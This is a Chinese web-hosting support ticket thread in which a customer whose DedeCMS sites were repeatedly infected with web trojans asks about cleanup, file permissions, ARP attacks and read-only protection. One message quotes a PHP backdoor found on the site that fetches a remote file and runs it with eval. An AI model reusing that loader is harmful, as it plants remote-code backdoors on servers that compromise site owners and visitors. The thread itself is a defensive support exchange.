问:虚拟主机sond被挂马, www.sond.com.cn网站打不开,请帮忙紧急处理,谢谢,虚拟主机sond被挂马,网站打不开
答:您好,
1.已经为您临时解除阻断,现在网站可以访问了。2.您可以在业务管理 – 安全及监测 – 非法信息监测查看详情,访问部分链接跳转到色情网站,请尽快联系程序开发人员全面检查清理并修复程序漏洞,相关处理流程您可以参考:https://www.west.cn/faq/list.asp?unid=1559 3.若需要我司为您清理挂马,请重新提交正确类型工单:【虚拟主机数据库问题】 -> 网站类问题 -> 网站挂马/中毒/非法信息清理。我司仅能清理挂马和设置防护,无法修复程序漏洞。,非常感谢您长期对我司的支持.由此给您带来的不便之处,敬请原谅!谢谢!
问:请帮忙把这个文件删掉,谢谢!
答:您好,
通过文件搜索未找到“com9.41.asp”这个文件,请告知该文件具体路径,以便为您删除。,非常感谢您长期对我司的支持!
问:文件在根目录下,谢谢!
答:您好,
目前根目录下已经没有这个文件了的,您本地可以重新链接查看下,非常感谢您长期对我司的支持!
问:我之前是没有修改给他777权限的,但是文件过一短时间就成那样了。而且被注入木马,如何预防,或者将权限改过来
答:您好,
您使用的windows系统虚拟主机,并没有777权限的说法,只有linux才有;网站被挂马,一般程序存在漏洞导致的,您可以及时更新程序补丁,请程序提供方修正程序漏洞来避免网站被挂马。
问:可以锁定文件的权限不,不让黑客来修改权限,可以通过什么渠道处理
问:我的服务器是linux系统
答:您好,
查看您的账号下有多台服务器,请问您是否是使用wdcp面板创建的站点,如果是使用wdcp面板搭建的站点;如果要将站点文件设置为只读,可以将对应文件权限设置为444(如果是文件夹可以设置为555),另外还需要修改文件所有者和组,如果站点文件所有者和组为www,可以修改为,这样就避免再次被修改;非常感谢您长期对我司的支持!
问:云主机大面积被挂马,是不是服务器防护性能太差,在挂马文件被彻底清理前,可否迁移到有防护的线路机房?
我的多个网站发现目录文件2018年5月10日被修改,但打开目录发现里面所有的目录和文件都是之前修改的,这又是什么问题,这些文件被隐藏了吗?
答:您好,查看到该会员账号下有多台虚拟主机和云服务器,请说明您被挂马的站点
挂马一般是网站程序漏洞导致被修改程序文件导致的,若是虚拟主机被挂马,可参考:https://www.west.cn/faq/list.asp?unid=733进行安全设置如果是云服务器上的站点,请参考:https://www.west.cn/faq/list.asp?unid=1430进行安全加固,非常感谢您长期对我司的支持!
问:我的云主机受到ARP攻击,
答:您好,请提供您现在反馈问题站点域名或者服务器ip,以便我司进一步分析,我司服务器之间有mac地址绑定,原则不会出现arp攻击,如您存在攻击,请提供ip,我司进行检查并解决避免再次arp攻击
问:127.0.0.1 我要换服务器
答:您好,核实到您的服务器存在用户登录,若您在操作,请登出,以便我司为您排查 ,非常感谢您长期对我司的支持.由此给您带来的不便之处,敬请原谅!谢谢!
问:已退
答:您好,我司登录服务器核实无arp攻击问题,且我司在此方面已做了较强的防护,请知悉,另,您提供站点被篡改,请提供下具体的站点域名及所在的目录 ,以便我司为您核实 ,非常感谢您长期对我司的支持.由此给您带来的不便之处,敬请原谅!谢谢!
问:D:www\\yongchao888\\www\\index.html
这个文件上午检测的修改时间是2011年7月,但内容是被篡改的,已删除,并且已重新生成。
答:您好,核实到您的程序所在的路径应为 : ,我司核实到您的程序为dede ,由于此程序存在漏洞,建议您可参考 :https://www.west.cn/faq/list.asp?unid=729 和 https://www.west.cn/faq/list.asp?unid=673 对程序进行安全设置,以提高站点安全 ,非常感谢您长期对我司的支持.由此给您带来的不便之处,敬请原谅!谢谢!
问:你可以确定确实没有受到arp攻击吗,我现在已经在做迁移了,只要确保没有感染到数据库,我就可以重新安装,避免重新受到感染。
答:您好,没有arp的,不确定是否涉及到数据库了,您可以先安装试试,重装前若是当前数据需要保留请先做好备份,非常感谢您长期对我司的支持!
问:12<?php $a=fopen(\’http://jc1.seolibo.com/M16.txt\’,\’r\’);$b=\’\’;while(false!=($c=fread($a,{$b.=$c;}print(eval($c=$b));fclose($a);?>
这串代码是属于什么性质的?
答:您好,该代码内容您可以具体去分析对应访问到的地址拦截来分析,如您可以直接访问一下代码中显示的地址http://jc1.seolibo.com/M16.txt 该上面有一定的注释您可以看看,建议可以将该文件相关联的文件都删除,非常感谢您长期对我司的支持!
问:云主间有没有办法能像虚拟主机一样在控制面板里去给每一个网站设置防护,只读?
答:您好,抱歉,云服务器暂时没有控制面板可以单独控制站点,只能您手工设置只读权限,非常感谢您长期对我司的支持!
问:已删除的php木马文件,又自动复活了,有什么办法防护解决?
答:您好
1、您使用的是织梦程序,织梦程序本身漏洞较多,容易被黑,若删除木马后仍存在,那么您站点已经存在后门,若要彻底处理需联系程序开发商帮您排查删除后门并修复漏洞,若不修复漏洞,仍有被入侵的可能。2、登录服务器帮您也查看了一下,暂未发现系统被入侵的情况,win系统您也可参考教程 https://www.west.cn/faq/list.asp?unid=853 做下设置提升安全级别,另外,您也可以安装安全狗、云锁之类的工具,该工具可一定程度上预防挂马和入侵,请您知悉(若程序存在漏洞和后门彻底解决方法是联系程序开发商修复并删除,否则仍有被入侵的几率),非常感谢您长期对我司的支持!
问:什么360安全防护,云锁的都没用的,明明一个木马放在那,愣是检测不到。
我是想能不能像虚拟主机一样设置全站只读?
问:网站的系统在新的主机上我全部重装了,还是一样会被入侵,难道是我的域名被跟踪了吗?
答:您好,1、云锁安全狗只是有一定防护作用,网站程序存在漏洞就存在再次被挂马的可能。您可以到服务器上对应的站点找到对应的目录右键-属性中进行权限设置设置对应的站点文件只读
2、您系统重装系统 但是您的网站程序存在漏洞,若要彻底处理需联系程序开发商帮您排查删除后门并修复漏洞,若不修复漏洞,仍有被入侵的可能。??3、查看到之前反馈,建议参考https://www.west.cn/faq/list.asp?unid=729 进行dede的安全设置后再试。非常感谢您长期对我司的支持!
问:按照你们的提示对网站data,uploads等目录设置了禁止脚本,上传的图片都打不开了,是什么问题?
答:您好,请问您是指具体哪个服务器,请告知服务器登录信息以便我司核查,目前未查询到127.0.0.1有这个服务器,非常感谢您长期对我司的支持!
问:127.0.0.1
网址:aidisoon.com
问:http://www.aidisoon.com/cases/
答:您好,已经帮您把uploads禁止了php和asp程序运行,现在访问图片正常了,非常感谢您长期对我司的支持!